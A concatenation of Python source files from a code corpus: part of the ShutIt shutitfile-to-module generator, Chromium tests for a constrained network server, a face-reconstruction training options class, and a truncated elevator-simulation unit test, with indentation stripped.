def handle_shutitfile_script_line(shutit, line, numpushes, wgetgot, numlogins, ifdepth, current_note):
shutitfile_command = line[0].upper()
build = ''
numtabs = 2 + ifdepth
assert shutitfile_command in ('RUN','SEND','SEND_EXPECT','SEND_EXPECT_MULTI','EXPECT_REACT','SEND_EXPECT_REACT','SEND_UNTIL','UNTIL','UNTIL','ASSERT_OUTPUT_SEND','ASSERT_OUTPUT','PAUSE_POINT','EXPECT','EXPECT_MULTI','LOGIN','USER','LOGOUT','GET_AND_SEND_PASSWORD','LOGIN_WITH_PASSWORD','USER_WITH_PASSWORD','WORKDIR','COPY','ADD','ENV','INSTALL','REMOVE','COMMENT','NOTE','IF','ELSE','ELIF','IF_NOT','ELIF_NOT','ENDIF','RUN_SCRIPT','SCRIPT_BEGIN','START_BEGIN','START_END','STOP_BEGIN','STOP_END','TEST_BEGIN','TEST_END','BUILD_BEGIN','BUILD_END','ISINSTALLED_BEGIN','ISINSTALLED_END','COMMIT','PUSH','REPLACE_LINE','ENSURE_LINE','LOG','QUIT','STORE_RUN','VAGRANT_LOGIN','VAGRANT_LOGOUT'), '%r is not a handled script command' % shutitfile_command
if shutitfile_command in ('RUN','SEND'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'SEND_EXPECT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''',expect="""
current_note = ''
elif shutitfile_command == 'EXPECT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """'''""" + cmd + """''')"""
elif shutitfile_command == 'SEND_EXPECT_MULTI':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.multisend('''""" + cmd + """''',"""
current_note = ''
elif shutitfile_command == 'EXPECT_MULTI':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
multi_dict = str(shutitfile_args)
build += multi_dict + """,note='''""" + current_note + """''')"""
elif shutitfile_command == 'SEND_EXPECT_REACT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''',follow_on_commands="""
current_note = ''
elif shutitfile_command == 'EXPECT_REACT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
multi_dict = str(shutitfile_args)
# We don't check exit here, as reactions will often have failing commands.
build += multi_dict + ",check_exit=False)"
elif shutitfile_command == 'SEND_UNTIL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send_until('''""" + cmd + """''',"""
current_note = ''
elif shutitfile_command == 'UNTIL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """'''""" + cmd + """''',note='''""" + current_note + """''')"""
elif shutitfile_command == 'PAUSE_POINT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
msg = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.pause_point('''""" + msg + """''')"""
elif shutitfile_command == 'QUIT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.fail('''""" + cmd + """''')"""
elif shutitfile_command == 'LOGOUT':
build += """\n""" + numtabs*'\t' + """shutit.logout(note='''""" + current_note + """''')"""
current_note = ''
numlogins -= 1
elif shutitfile_command == 'VAGRANT_LOGIN':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
machine_name = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login('''vagrant ssh """ + machine_name + """''',note='''""" + current_note + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.login('''sudo su -''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'VAGRANT_LOGOUT':
build += """\n""" + numtabs*'\t' + """shutit.logout()"""
build += """\n""" + numtabs*'\t' + """shutit.logout(note='''""" + current_note + """''')"""
current_note = ''
numlogins -= 1
elif shutitfile_command == 'ASSERT_OUTPUT_SEND':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """_cmd = '''""" + cmd + """'''\n\t\t_output = shutit.send_and_get_output('''""" + cmd + """''',note='''""" + current_note + """''')\n\t\timport re\n\t\tif not re.match('''"""
current_note = ''
elif shutitfile_command == 'ASSERT_OUTPUT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
expected_output = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += expected_output + """''', _output):\n""" + numtabs*'\t' + """\tshutit.pause_point('''Output of: ''' + _cmd + ''' was: ''' + _output + ''' It should be: """ + expected_output + """''')"""
elif shutitfile_command == 'LOGIN':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login(command='""" + cmd + """',note='''""" + current_note + """''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'USER':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login(user='""" + cmd + """',note='''""" + current_note + """''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'GET_AND_SEND_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
msg = scan_text(' '.join(shutitfile_args)) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.send(_password,echo=False,check_exit=False,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'LOGIN_WITH_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
msg = scan_text(line[2]) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.login(command='""" + cmd + """', password=_password,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'USER_WITH_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
msg = scan_text(line[2]) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.login(user='""" + cmd + """', password=_password,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'WORKDIR':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''pushd """ + cmd + """''',echo=False,note='''""" + current_note + """''')"""
current_note = ''
numpushes += 1
elif shutitfile_command == 'COPY' or shutitfile_command == 'ADD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
# The <src> path must be inside the context of the build; you cannot COPY ../something /something, because the first step of a docker build is to send the context directory (and subdirectories) to the docker daemon.
if shutitfile_args[0][0:1] == '..' or shutitfile_args[0][0] == '/' or shutitfile_args[0][0] == '~':
shutit.fail('Invalid line: ' + str(shutitfile_args) + ' file must be in local subdirectory')
if shutitfile_args[1][-1] == '/':
# Dir we're COPYing or ADDing to
destdir = scan_text(shutitfile_args[1])
# File/dir we're COPYing or ADDing from
fromfile = scan_text(shutitfile_args[0])
# Final file/dir
outfile = destdir + fromfile
if os.path.isfile(fromfile):
outfiledir = os.path.dirname(fromfile)
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + """/""" + outfiledir + """''',note='''""" + current_note + """''')"""
current_note = ''
elif os.path.isdir(fromfile):
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + fromfile + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
outfile = shutitfile_args[1]
# If this is something we have to wget:
if shutitfile_command == 'ADD' and urlparse(shutitfile_args[0])[0] != '':
if not wgetgot:
build += """\n""" + numtabs*'\t' + """shutit.install('wget')"""
wgetgot = True
if shutitfile_args[1][-1] == '/':
destdir = scan_text(destdir[0:-1])
outpath = scan_text(urlparse(shutitfile_args[0])[2])
outpathdir = os.path.dirname(outpath)
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + outpathdir + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.send('''wget -O """ + destdir + outpath + ' ' + shutitfile_args[0] + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
outpath = scan_text(shutitfile_args[1])
destdir = scan_text(os.path.dirname(shutitfile_args[1]))
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.send('''wget -O """ + outpath + ' ' + shutitfile_args[0] + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
# From the local filesystem on construction:
localfile = scan_text(shutitfile_args[0])
# Local file location on build:
buildstagefile = scan_text(shutitfile_args[0])
#if localfile[-4:] == '.tar':
# build += """\n\t\tshutit.send_file('""" + outfile + '/' + localfile + """')"""
#elif localfile[-4:] == '.bz2':
#elif localfile[-3:] == '.gz':
#elif localfile[-3:] == '.xz':
if os.path.isdir(localfile):
build += """\n""" + numtabs*"""\t""" + """shutit.send_host_dir('''""" + outfile + """''', '''""" + buildstagefile + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
build += """\n""" + numtabs*"""\t""" + """shutit.send_host_file('''""" + outfile + """''', '''""" + buildstagefile + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'ENV':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
for k,v in iteritems(shutitfile_args):
k = scan_text(k)
v = scan_text(v)
build += """\n""" + numtabs*"""\t""" + """shutit.send('''export """ + k + '=' + v + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'INSTALL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
build += """\n""" + numtabs*"""\t""" + """shutit.install('''""" + scan_text(' '.join(shutitfile_args)) + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'REMOVE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
build += """\n""" + numtabs*'\t' + """shutit.remove('''""" + scan_text(' '.join(shutitfile_args)) + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command in ('COMMENT','NOTE'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
# COMMENT line should come before the next appropriate line where it can be used, where it is 'consumed' in a note.
build += """\n""" + numtabs*"""\t""" + """# """ + scan_text(' '.join(shutitfile_args))
current_note += scan_text(' '.join(shutitfile_args))
elif shutitfile_command in ('IF','IF_NOT'):
subcommand = scan_text(line[1])
subcommand_args = scan_text(' '.join(line[2:]))
if subcommand == 'FILE_EXISTS':
statement = """shutit.file_exists('''""" + subcommand_args + """''',directory=None,note='''""" + current_note + """''')"""
current_note = ''
elif subcommand == 'INSTALL_TYPE':
statement = """shutit.get_current_shutit_pexpect_session_environment(note='''""" + current_note + """''').install_type == '''""" + subcommand_args + """'''"""
current_note = ''
elif subcommand == 'RUN':
statement = """shutit.send_and_return_status('''""" + subcommand_args + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
shutit.fail('subcommand: ' + subcommand + ' not handled')
if shutitfile_command == 'IF':
build += """\n""" + numtabs*"""\t""" + """if """ + statement + """:"""
elif shutitfile_command == 'IF_NOT':
build += """\n""" + numtabs*"""\t""" + """if not """ + statement + """:"""
ifdepth += 1
elif shutitfile_command == 'ELSE':
if shutitfile_command == 'ELSE':
build += """\n""" + (numtabs-1)*"""\t""" + """else:"""
elif shutitfile_command in ('ELIF','ELIF_NOT'):
subcommand = scan_text(line[1])
subcommand_args = scan_text(' '.join(line[2:]))
if subcommand == 'FILE_EXISTS':
statement = """shutit.file_exists('''""" + subcommand_args + """''',directory=None,note='''""" + current_note + """''')"""
current_note = ''
elif subcommand == 'INSTALL_TYPE':
statement = """shutit.get_current_shutit_pexpect_session_environment(note='''""" + current_note + """''').install_type == '""" + subcommand_args + """'"""
current_note = ''
elif subcommand == 'RUN':
statement = """shutit.send_and_return_status('''""" + subcommand_args + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
shutit.fail('subcommand: ' + subcommand + ' not handled')
if shutitfile_command == 'ELIF':
build += """\n""" + (numtabs-1)*'\t' + '''elif ''' + statement + ''':'''
elif shutitfile_command == 'ELIF_NOT':
build += """\n""" + (numtabs-1)*"""\t""" + """elif not """ + statement + """:"""
elif shutitfile_command == 'ENDIF':
ifdepth -= 1
elif shutitfile_command == 'RUN_SCRIPT':
shutitfile_args = line[1]
assert isinstance(shutitfile_args, str)
script = scan_text(shutitfile_args)
build += """\n""" + numtabs*"""\t""" + """shutit.run_script('''""" + script + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'COMMIT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
assert len(shutitfile_args) == 1
repo_name = scan_text(shutitfile_args[0])
_default_repo_name = 'mymodule'
if repo_name == _default_repo_name:
shutit.log('The docker container will be committed with the default repo_name: ' + _default_repo_name + '.\nYou can change this by adding this to the ~/.shutit/config file:\n\n[repository]\nname:yourname\n\nand re-running.',level=logging.WARNING)
if len(shutitfile_args) == 1:
build += """\n""" + numtabs*"""\t""" + """shutit.do_repository_work('''""" + repo_name + """''',force=None,tag=True,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'PUSH':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
assert len(shutitfile_args) == 1
assert shutit.repository['user'] != '', 'If you want to push, set the [repository] settings (user,password,email) in your ~/.shutit/config file.'
repo_name = scan_text(shutitfile_args[0])
build += """\n""" + numtabs*"""\t""" + """shutit.push_repository('''""" + repo_name + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'REPLACE_LINE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
# TODO: assert existence of these
line = scan_text(shutitfile_args['line'])
filename = scan_text(shutitfile_args['filename'])
pattern = scan_text(shutitfile_args['pattern'])
build += """\n""" + numtabs*'\t' + """shutit.replace_text('''""" + line + """''','''""" + filename + """''',pattern='''""" + pattern + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'ENSURE_LINE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
# TODO: assert existence of these
line = scan_text(shutitfile_args['line'])
filename = scan_text(shutitfile_args['filename'])
build += """\n""" + numtabs*'\t' + """shutit.replace_text('''""" + line + """''','''""" + filename + """''',pattern='''""" + line + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'LOG':
shutitfile_args = scan_text(line[1])
assert isinstance(shutitfile_args, str) and shutitfile_args in ('DEBUG','WARNING','CRITICAL','INFO','ERROR')
build += """\n""" + numtabs*'\t' + """import logging"""
build += """\n""" + numtabs*'\t' + """logging.getLogger().setLevel(logging.""" + shutitfile_args + """)"""
elif shutitfile_command == 'STORE_RUN':
config_item = scan_text(line[1])
command = scan_text(' '.join(line[2:]))
build += """\n""" + numtabs*'\t' + """shutit.cfg[self.module_id]['""" + config_item + """'] = shutit.send_and_get_output('''""" + command + """''',note='''""" + current_note + """''')"""
current_note = ''
# See shutitfile_get_section
elif shutitfile_command in ('SCRIPT_BEGIN','START_BEGIN','START_END','STOP_BEGIN','STOP_END','TEST_BEGIN','TEST_END','BUILD_BEGIN','BUILD_END','ISINSTALLED_BEGIN','ISINSTALLED_END'):
# No action to perform on these lines, but they are legal.
pass
else:
shutit.fail('shutitfile_command: ' + shutitfile_command + ' not handled')
return build, numpushes, wgetgot, numlogins, ifdepth, current_note
def scan_text(text):
"""Scan text, and replace items that match shutit's pattern format, ie:
{{ shutit.THING }}
"""
while True:
match = re.match("(.*){{ shutit.(.*) }}(.*)$", text)
if match:
before = match.group(1)
name = match.group(2)
after = match.group(3)
text = before + """''' + shutit.cfg[self.module_id][\"""" + name + """\"] + '''""" + after
else:
break
return text
# Get the section of the shutitfile we are in.
def shutitfile_get_section(shutitfile_command, current):
match = re.match(r'^(.*)_(BEGIN|END)$',shutitfile_command)
if match:
section = match.group(1)
stage = match.group(2)
if stage == 'BEGIN':
return section.lower()
return 'build'
return current
|
media/tools/constrained_network_server/cns_test.py | Scopetta197/chromium | 212 | 12609904 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for Constrained Network Server."""
import os
import signal
import subprocess
import tempfile
import time
import unittest
import urllib2
import cns
import traffic_control
# The local interface to test on.
_INTERFACE = 'lo'
class PortAllocatorTest(unittest.TestCase):
"""Unit tests for the Port Allocator class."""
# Expiration time for ports. In mock time.
_EXPIRY_TIME = 6
def setUp(self):
# Mock out time.time() to accelerate port expiration testing.
self._old_time = time.time
self._current_time = 0
time.time = lambda: self._current_time
# TODO(dalecurtis): Mock out actual calls to shadi's port setup.
self._pa = cns.PortAllocator(cns._DEFAULT_CNS_PORT_RANGE, self._EXPIRY_TIME)
self._MockTrafficControl()
def tearDown(self):
self._pa.Cleanup(_INTERFACE, all_ports=True)
# Ensure ports are cleaned properly.
self.assertEquals(self._pa._ports, {})
time.time = self._old_time
self._RestoreTrafficControl()
def _MockTrafficControl(self):
self.old_CreateConstrainedPort = traffic_control.CreateConstrainedPort
self.old_DeleteConstrainedPort = traffic_control.DeleteConstrainedPort
self.old_TearDown = traffic_control.TearDown
traffic_control.CreateConstrainedPort = lambda config: True
traffic_control.DeleteConstrainedPort = lambda config: True
traffic_control.TearDown = lambda config: True
def _RestoreTrafficControl(self):
traffic_control.CreateConstrainedPort = self.old_CreateConstrainedPort
traffic_control.DeleteConstrainedPort = self.old_DeleteConstrainedPort
traffic_control.TearDown = self.old_TearDown
def testPortAllocator(self):
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Call again with the same key and make sure we get the same port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Call with a different key and make sure we get a different port.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# Update fake time so that ports should expire.
self._current_time += self._EXPIRY_TIME + 1
# Test to make sure cache is checked before expiring ports.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# Update fake time so that ports should expire.
self._current_time += self._EXPIRY_TIME + 1
# Request a new port, old ports should be expired, so we should get the
# first port in the range. Make sure this is the only allocated port.
self.assertEquals(self._pa.Get('test3'), cns._DEFAULT_CNS_PORT_RANGE[0])
self.assertEquals(self._pa._ports.keys(), [cns._DEFAULT_CNS_PORT_RANGE[0]])
def testPortAllocatorExpiresOnlyCorrectPorts(self):
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Stagger port allocation and so we can ensure only ports older than the
# expiry time are actually expired.
self._current_time += self._EXPIRY_TIME / 2 + 1
# Call with a different key and make sure we get a different port.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# After this sleep the port with key 'test' should expire on the next Get().
self._current_time += self._EXPIRY_TIME / 2 + 1
# Call with a different key and make sure we get the first port.
self.assertEquals(self._pa.Get('test3'), cns._DEFAULT_CNS_PORT_RANGE[0])
self.assertEquals(set(self._pa._ports.keys()), set([
cns._DEFAULT_CNS_PORT_RANGE[0], cns._DEFAULT_CNS_PORT_RANGE[0] + 1]))
def testPortAllocatorNoExpiration(self):
# Setup PortAllocator w/o port expiration.
self._pa = cns.PortAllocator(cns._DEFAULT_CNS_PORT_RANGE, 0)
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Update fake time to see if ports expire.
self._current_time += self._EXPIRY_TIME
# Send second Get() which would normally cause ports to expire. Ensure that
# the ports did not expire.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
self.assertEquals(set(self._pa._ports.keys()), set([
cns._DEFAULT_CNS_PORT_RANGE[0], cns._DEFAULT_CNS_PORT_RANGE[0] + 1]))
class ConstrainedNetworkServerTest(unittest.TestCase):
"""End to end tests for ConstrainedNetworkServer system."""
# Amount of time to wait for the CNS to start up.
_SERVER_START_SLEEP_SECS = 1
# Sample data used to verify file serving.
_TEST_DATA = 'The quick brown fox jumps over the lazy dog'
# Server information.
_SERVER_URL = ('http://127.0.0.1:%d/ServeConstrained?' %
cns._DEFAULT_SERVING_PORT)
# Setting for latency testing.
_LATENCY_TEST_SECS = 1
def _StartServer(self):
"""Starts the CNS, returns pid."""
cmd = ['python', 'cns.py', '--interface=%s' % _INTERFACE]
process = subprocess.Popen(cmd, stderr=subprocess.PIPE)
# Wait for server to startup.
line = True
while line:
line = process.stderr.readline()
if 'STARTED' in line:
return process.pid
self.fail('Failed to start CNS.')
def setUp(self):
# Start the CNS.
self._server_pid = self._StartServer()
# Create temp file for serving. Run after server start so if a failure
# during setUp() occurs we don't leave junk files around.
f, self._file = tempfile.mkstemp(dir=os.getcwd())
os.write(f, self._TEST_DATA)
os.close(f)
# Strip cwd off so we have a proper relative path.
self._relative_fn = self._file[len(os.getcwd()) + 1:]
def tearDown(self):
os.unlink(self._file)
os.kill(self._server_pid, signal.SIGTERM)
def testServerServesFiles(self):
now = time.time()
f = urllib2.urlopen('%sf=%s' % (self._SERVER_URL, self._relative_fn))
# Verify file data is served correctly.
self.assertEqual(self._TEST_DATA, f.read())
# For completeness ensure an unconstrained call takes less time than our
# artificial constraints checked in the tests below.
self.assertTrue(time.time() - now < self._LATENCY_TEST_SECS)
def testServerLatencyConstraint(self):
"""Tests serving a file with a latency network constraint."""
# Abort if does not have root access.
self.assertEqual(os.geteuid(), 0, 'You need root access to run this test.')
now = time.time()
base_url = '%sf=%s' % (self._SERVER_URL, self._relative_fn)
url = '%s&latency=%d' % (base_url, self._LATENCY_TEST_SECS * 1000)
f = urllib2.urlopen(url)
# Verify file data is served correctly.
self.assertEqual(self._TEST_DATA, f.read())
# Verify the request took longer than the requested latency.
self.assertTrue(time.time() - now > self._LATENCY_TEST_SECS)
# Verify the server properly redirected the URL.
self.assertEquals(f.geturl(), base_url.replace(
str(cns._DEFAULT_SERVING_PORT), str(cns._DEFAULT_CNS_PORT_RANGE[0])))
if __name__ == '__main__':
unittest.main()
|
options.py | JungahYang/Deep3DFaceReconstruction | 1,424 | 12609918 | <filename>options.py
import numpy as np
import tensorflow as tf
import os
# training options
class Option():
def __init__(self,model_name=None,is_train=True):
#--------------------------------------------------------------------------------------
self.is_train = is_train
self.model_dir = 'result'
if model_name is None:
self.model_name = 'model_test'
else:
self.model_name = model_name
self.data_path = ['./processed_data']
self.val_data_path = ['./processed_data']
self.model_save_path = os.path.join(self.model_dir,self.model_name)
if self.is_train:
if not os.path.exists(self.model_save_path):
os.makedirs(self.model_save_path)
self.summary_dir = os.path.join(self.model_save_path,'summary')
self.train_summary_path = os.path.join(self.summary_dir, 'train')
self.val_summary_path = os.path.join(self.summary_dir, 'val')
#---------------------------------------------------------------------------------------
# visible gpu settings
self.config = tf.ConfigProto()
self.config.gpu_options.visible_device_list = '0'
self.use_pb = True
#---------------------------------------------------------------------------------------
# training parameters
self.w_photo = 1.92
self.w_lm = 1.6e-3
self.w_id = 0.2
self.w_reg = 3.0e-4
self.w_ref = 5.0
self.w_gamma = 10.0
self.w_ex = 0.8
self.w_tex = 1.7e-2
self.batch_size = 16
self.boundaries = [100000]
lr = [1e-4,2e-5]
self.global_step = tf.Variable(0,name='global_step',trainable = False)
self.lr = tf.train.piecewise_constant(self.global_step,self.boundaries,lr)
self.augment = True
self.train_maxiter = 200000
self.train_summary_iter = 50
self.image_summary_iter = 200
self.val_summary_iter = 1000
self.save_iter = 10000
#---------------------------------------------------------------------------------------
# initial weights for resnet and facenet
self.R_net_weights = os.path.join('./weights/resnet','resnet_v1_50.ckpt')
self.Perceptual_net_weights = './weights/id_net/model-20170512-110547.ckpt-250000'
self.pretrain_weights = os.path.join('train/model_test','iter_100000.ckpt')
|
rlschool/liftsim/environment/mansion/test_elevator.py | ANCL/QuadPPO | 169 | 12609936 | <reponame>ANCL/QuadPPO<filename>rlschool/liftsim/environment/mansion/test_elevator.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit test class
"""
from rlschool.liftsim.environment.mansion.person_generators.uniform_generator import UniformPersonGenerator
from rlschool.liftsim.environment.mansion import person_generators
from rlschool.liftsim.environment.mansion.person_generators import uniform_generator
from rlschool.liftsim.environment.mansion.utils import PersonType, MansionState, ElevatorState, ElevatorAction
from rlschool.liftsim.environment.mansion.elevator import Elevator
from rlschool.liftsim.environment.mansion.mansion_manager import MansionManager
from rlschool.liftsim.environment.mansion.mansion_config import MansionConfig
import sys
import unittest
import mock
class TestElevator(unittest.TestCase):
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_door_load_unload(self, mock_uniformgenerator):
"""
stop at the target, load and unload corresponding passengers, open and close the door properly
"""
max_floors = 8
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_position = 8.0
test_elevator._target_floors = [3, 5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[2].append(
PersonType(6, 40, 1, 3, world.raw_time))
test_elevator._loaded_person[4].append(
PersonType(7, 35, 1, 5, world.raw_time))
test_elevator._load_weight = 80
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 30, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 6, 4, world.raw_time))
ret_person.append(PersonType(4, 55, 3, 4, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.5)
# mock generate_person again
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # Door fully open, t = 1.0
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # passenger 6 is unloaded, t = 3.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 40)
dispatch = []
dispatch.append(ElevatorAction(0, 0))
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # passenger 0 and 4 are loaded, t = 5.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 145)
for i in range(4):
test_mansion.run_mansion(dispatch)
state = test_mansion.state # passenger 5 is loaded, t = 7.0
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 210)
for i in range(4):
test_mansion.run_mansion(dispatch)
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state # the door is closed, going up, t = 9.0
